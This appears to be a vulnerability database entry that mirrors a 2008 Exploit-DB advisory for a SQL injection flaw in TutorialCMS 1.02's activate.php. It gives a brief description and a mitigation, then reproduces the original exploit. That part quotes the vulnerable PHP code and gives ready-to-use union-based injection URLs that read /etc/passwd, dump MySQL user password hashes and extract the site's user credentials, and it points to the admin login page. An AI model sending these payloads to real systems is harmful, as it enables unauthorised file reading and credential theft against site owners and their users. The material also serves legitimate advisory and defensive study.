TutorialCMS 1.02 Remote SQL Injection Vulnerability

vendor:

TutorialCMS

by:

ka0x

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: TutorialCMS

Affected Version From: 01.02

Affected Version To: 01.02

Patch Exists: YES

Related CWE: N/A

CPE: a:wavelinkmedia:tutorialcms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

TutorialCMS 1.02 Remote SQL Injection Vulnerability

A vulnerability exists in TutorialCMS 1.02 in the activate.php file, which allows an attacker to inject malicious SQL queries. An attacker can use the vulnerability to gain access to the admin panel by exploiting the magic_quotes_gpc = off setting. The encription of the password is MD5.

Mitigation:

Ensure that the magic_quotes_gpc setting is enabled and that all user input is properly sanitized.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 TutorialCMS 1.02 Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

bug found by ka0x
contact: ka0x01[at]gmail.com
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
#from spain

download http://www.wavelinkmedia.com/scripts/tutorialcms/

need magic_quotes_gpc = off

vulnerability in activate.php

vuln code:
[...]

$userName = $_GET["userName"];
$code     = $_GET["activate"];
$sql = "SELECT activated FROM users WHERE username = '$userName' AND activated = '$code'";

[...]

/etc/password:
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,9,9,9,9/*

User and Password from mysql.user:
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(user,0x203a3a20,password),6,7,8,9,9,9,9,9/**/from/**/mysql.user/*

POC: http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(0x757365723a20,username,0x20706173733a20,password),6,7,8,9,9,9,9,9/**/from/**/users/*

The encription of password is MD5
login: http://[host]/admin

# milw0rm.com [2008-01-12]